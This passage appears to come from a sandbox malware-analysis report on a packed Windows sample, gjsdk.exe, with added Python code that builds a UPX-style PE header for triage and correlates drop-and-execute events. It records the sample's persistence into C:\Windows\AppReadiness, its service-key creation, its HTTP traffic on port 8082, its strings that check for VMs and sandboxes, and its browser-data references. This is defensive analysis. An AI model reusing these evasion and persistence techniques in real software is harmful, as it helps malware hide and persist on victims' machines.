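            # packer layout: empty executable section the stub fills at runtime
            findings.append(f"{s.name}: executable section with no raw data")
        if s.raw_size and s.raw_pointer + s.raw_size > pe.file_size:
            findings.append(f"{s.name}: raw data extends past end of file")
    if any(s.name.startswith("UPX") for s in pe.sections):
        findings.append("UPX section layout")
    if pe.file_size > ONE_MIB:
        findings.append(f"file size {pe.file_size} > {ONE_MIB}")
    return findings


def build_sample_pe() -> bytes:
    """Constructed header-only PE32+ with the report's section layout (not the real file)."""
    sections = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics
        (b"UPX0", 0x00370000, 0x001000, 0x000000, 0x000400, 0xE0000080),
        (b"UPX1", 0x00B8F000, 0x371000, 0xB8EE00, 0x000400, 0xE0000040),
        (b"UPX2", 0x00001000, 0xF00000, 0x000200, 0xB8F200, 0xC0000040),
    ]
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = bytearray(240)  # size of a PE32+ optional header
    struct.pack_into("<H", opt, 0, 0x20B)  # IMAGE_NT_OPTIONAL_HDR64_MAGIC
    struct.pack_into("<H", opt, 70, 0x8160)  # the four DllCharacteristics bits in the report
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x0022)
    hdrs = b"".join(struct.pack(SECTION_HDR, n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(dll_characteristics_names(info.dll_characteristics))
    for finding in triage(info):
        print(finding)
```

Run against a real file with parse_pe(open(path, "rb").read()); the "raw data extends past end of file" finding then also catches truncated or partially downloaded samples before any dynamic analysis is attempted.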

Persistence and Installation Behavior

Source: unknown Executable created and started: C:\Windows\AppReadiness\mmzwi.exe
Source: C:\Users\user\Desktop\gjsdk.exe PE file moved: C:\Windows\AppReadiness\mmzwi.exe Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr Jump to behavior
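The three entries above are the drop-and-execute chain in the signature "Drops executables to the windows directory (C:\Windows) and starts them": a user-profile binary writes into C:\Windows\AppReadiness, the written file is then started as a new process, and a key is created under Services. The script below is an added example, not Joe Sandbox code, that correlates these three event kinds in timestamp order over constructed Sysmon-style records modelled on the report; the .tmp-to-mmzwi.exe rename is an assumption drawn from the "File created" and "PE file moved" entries, and the field names are this example's own.

```python
"""Endpoint-telemetry correlation for drop-and-execute into C:\\Windows.

Added example, not Joe Sandbox code. SAMPLE_EVENTS are constructed Sysmon-style
records modelled on the report; the .tmp -> mmzwi.exe rename is assumed.
"""

WINDOWS_DIR = "c:\\windows\\"


def under_windows_dir(path: str) -> bool:
    return path.lower().startswith(WINDOWS_DIR)


def correlate(events: list) -> list:
    """Flag (1) files placed under C:\\Windows by an image outside it, (2) a later
    process start of such a dropped file, (3) service-key creation by an image
    outside C:\\Windows. Events are processed in timestamp order."""
    dropped = {}  # lower-cased path -> image that wrote it
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        kind, image = ev["event"], ev["image"]
        if kind in ("FileCreate", "FileRename"):
            target = ev["target"]
            if under_windows_dir(target) and not under_windows_dir(image):
                if kind == "FileRename":
                    dropped.pop(ev["source"].lower(), None)  # track the final name
                dropped[target.lower()] = image
                alerts.append(f"{image} placed {target} inside the system directory")
        elif kind == "ProcessCreate":
            writer = dropped.get(image.lower())
            if writer is not None:
                alerts.append(f"dropped executable started: {image} (written by {writer})")
        elif kind == "RegistryKeyCreate":
            if "\\services\\" in ev["target"].lower() and not under_windows_dir(image):
                alerts.append(f"{image} created service key {ev['target']}")
    return alerts


# Constructed events modelled on the report's behaviour entries.
SAMPLE_EVENTS = [
    {"ts": 1, "event": "FileCreate", "image": r"C:\Users\user\Desktop\gjsdk.exe",
     "target": r"C:\Windows\AppReadiness\.840809828.tmp"},
    {"ts": 2, "event": "FileRename", "image": r"C:\Users\user\Desktop\gjsdk.exe",
     "source": r"C:\Windows\AppReadiness\.840809828.tmp",
     "target": r"C:\Windows\AppReadiness\mmzwi.exe"},
    {"ts": 3, "event": "ProcessCreate", "image": r"C:\Windows\AppReadiness\mmzwi.exe",
     "parent": r"C:\Users\user\Desktop\gjsdk.exe"},
    {"ts": 4, "event": "RegistryKeyCreate", "image": r"C:\Users\user\Desktop\gjsdk.exe",
     "target": r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr"},
    # benign control: a system binary writing under C:\Windows is not flagged
    {"ts": 5, "event": "FileCreate", "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\Temp\benign.log"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The state kept in dropped is what turns three individually noisy events into one high-confidence alert: the ProcessCreate only fires when the image path is one that a non-system process wrote or renamed into C:\Windows earlier in the same stream.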

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 8082 (local ports 49730, 49731, 49732, 49733, 49734, 49736, 49741, 49743, 49744, 49745, 49773, 49953; the same flows listed under Networking)
Source: C:\Users\user\Desktop\gjsdk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: KVMKVMKVMKVMGetFileTimeGetFileTypeMicrosoft HvFORMAIFFGetFullPathNameWGetLastErrorGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassGetProcAddressGetProcessIdFORMAIFFVMwareVMwareGetProcessTimesXenVMMXenVMMbhyve bhyve GetStartupInfoWaudio/ai
Source: mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp Binary or memory string: <br/></ul>tbodytheadtfootstdinwhoisIPSecimap4rsyncsteamSkypeWhoIsNETSCXeroxMAILQVMNETUnifybhfhsFXP-1bhmdsVSLMPRTSPSbh611decapOnmuxArielSMPTEdsfgwalpesSMTPSss7nsaviandantzxvttpsnaretalkdripnguucpdkrcmdchcmddemonsonarVEMMIginadRUSHDnetGWrfilephoneKIOSKJSTELOBRPDROOTDIPCD3HuskyRxMonFTSRVMIMERBytexShiva3l-l1WinDDMSIMSradiocvmoncnhrpcft-0cft-1cft-2cft-3cft-4cft-5cft-6cft-7helloMMPFTSPICESlushCacheglobetroffrimslDSATPNETMLSNAPPdbrefRSMTPOrionvenusTOP/XTSILBspockWillyWinDbIPASSbruceSolveSonuswkarsqotpsAlarmUADTCaurisAISESaaftprmlnkPDnetREBOLqsoftICPv24TalkPlatoE-NetMySQLBBARSCSMS2jt400MS-LAITOSESariseMuleMCNTPA1-BSICMPDCVSupSSDTPProEdCDDBPWebSMqueuepokerIRISAHivePTrackBINKPquakeKuangyamux[E]: /hostES256ES384ES512EdDSAHS256HS384HS512RS256RS384RS512PS256PS384PS512%s=%qc(%s)
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: IDEAFARM-CATCH / NetDevil trojanVMware Authentication Daemon
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000368000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware Web Access
Source: gjsdk.exe, 00000000.00000002.1742065604.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000001.1731920546.00000000024DE000.00000040.00000001.01000000.00000005.sdmp Binary or memory string: QeMUY6J
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware Authentication Daemon / IDEAFARM-CHAT
Source: gjsdk.exe, 00000000.00000002.1742065604.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000001.1731920546.00000000024BF000.00000040.00000001.01000000.00000005.sdmp Binary or memory string: ijfV6o2HGfS
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0002CC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: places.sqliteplaces.sqliteClearCommError192.168.2.203192.168.2.204CloseHandleplaces.sqliteextensions.jsonConnectNamedPipeCreateDirectoryWCreateEventExWCreateEventWCreateFileWCreateHardLinkWCreateJobObjectWunsupported itemunsupported itemCreateMutexExWCreateMutexWparse error192.168.2.205CreateNamedPipeWCreatePipeCreateProcessW192.168.2.206192.168.2.207192.168.2.208AMDisbetter!DefineDosDeviceWDeleteFileWDeviceIoControlAuthenticAMDCentaurHaulsGenuineIntel192.168.2.209DuplicateHandleExitProcessFindCloseFindFirstFileWFindFirstVolumeWFindNextFileWFindNextVolumeWFindResourceWFindVolumeCloseFlushFileBuffersFlushViewOfFileFormatMessageWFreeLibraryGetCommStateGetCommTimeoutsGetCommandLineW192.168.2.210TransmetaCPUGetComputerNameW192.168.2.211192.168.2.212GetConsoleCPGetConsoleModeGenuineTMx86Geode by NSCVIA VIA VIA 192.168.2.213192.168.2.214KVMKVMKVMKVMGetDriveTypeWMicrosoft Hv192.168.2.215GetFileTimeGetFileType192.168.2.216VMwareVMwareGetFullPathNameWGetLastErrorGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassGetProcAddressGetProcessIdXenVMMXenVMMbhyve bhyve GetProcessTimes192.168.2.217192.168.2.218GetStartupInfoWHygonGenuineVortex86 SoCGetStdHandleSiS SiS SiS 192.168.2.219GetTempPathWGetTickCount64192.168.2.220RiseRiseRiseGetVersionGenuine RDC192.168.2.221192.168.2.222192.168.2.223192.168.2.224192.168.2.225IsWow64ProcessIsWow64Process2LoadLibraryExW192.168.2.226192.168.2.227LoadLibraryWLoadResourceLocalAllocLocalFreeLockFileExLockResourceMapViewOfFile192.168.2.228192.168.2.229Module32FirstW192.168.2.230192.168.2.231Module32NextW192.168.2.232192.168.2.233MoveFileExWGenuineIntel192.168.2.234MoveFileWOpenEventW192.168.2.235192.168.2.236OpenMutexWOpenProcessOpenThread192.168.2.237192.168.2.238Process32FirstWProcess32NextWPulseEventPurgeComm192.168.2.239Did you mean %q?QueryDosDeviceWReadConsReadFile ,,ReadConsoleWReleaseMutexW192.168.2.240192.168.2.241RemoveDirectoryWResetEventResumeThreadSetCommBreakSetCommMask192.168.2.242192.168.2.243SetCommStateshow help]192.168.2.244SetCommTimeoutsSetConsoleCPSetConsoleMode192.168.2.245[command]192.168.2.246192.168.2.247SetDllDirectoryW[command]192.168.2.248SetEndOfFileSetEnvirSetEvent192.168.2.249SetErrorModetestdata/fuzz
Source: mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp Binary or memory string: rlogindhcpv6vmwareradiuscpanelTelnetNI FTPGophervettcpFingerSUPDUPISO-IPJargonXyplexDirectrescapZannetHassleUTMPSDUTMPCDcomscmskronkMondexulpnetISAKMPPassGogdomapwhoamiudemonrepcmdSANityAminetRepCmdSun DRMeCommAgentXnloginquotadomservsubmitentombwpagesdevicevsinetmaitrdbusboynimregCARDAXPROOFDMurrayDNS2Gohermesudt_osDBStarTabulaPEportrfx-lmoracleisi-lm3ds-lmsna-csorbixdontimekermitrrirtrrrimwmrrilwmrrifmmrrisatcentraimperacaicciwinddxroketzproximencorepsmondRADIUSMyrtlecsoft1TALNETarmadptekplsmpnjscUniSQLsearchcdfuncsdfuncNBX CCNBX AUComcamAVENUEDOCENTRECIPeCVMMONpehelpsdhelpfcmsysFutrixWusageG-TalkGROOVEBMC ARDIRGISfjmpssREFTEKlabratDeliboCECSVCnetrekAMInetTragicOLHOSTtqdataRaven1Raven2aic-npcspuniatmtcpka0wucsilkp1silkp2silkp3silkp4glishddaishiEpiconROBOERJAMCT5JAMCT6SignalZARKOVBOSCAPITB301vsixmldi-asegds_dbTL1-LVVMODEMadmindSYSOPTfg-fpsfg-gippdrncsVNSSTRWebTIESUITJDDJ ILMSAVANTPharosN1-FWPActNetDJ-ICEA1-MSCEWCTSPxdsxdmJMACT3jmevt2iRDMI2PatrolLM DtaabarsdtruecmrasadvPalaceBlockshp-scohp-scaAsylummed-cipolicysha256deleteKOI8-RKOI8-U_count^(?i)(_blue__cyan_inverthiddenfinishack:%dIgnoreUTF-16[%d]%s
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0002CC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: gjsdk.exe, 00000000.00000002.1750980942.000002B0E4744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mmzwi.exe, 00000002.00000002.2966741709.000001F8FE57C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
Source: C:\Users\user\Desktop\gjsdk.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Queries volume information: C:\Users\user\Desktop\gjsdk.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\Windows\AppReadiness\mmzwi.exe VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior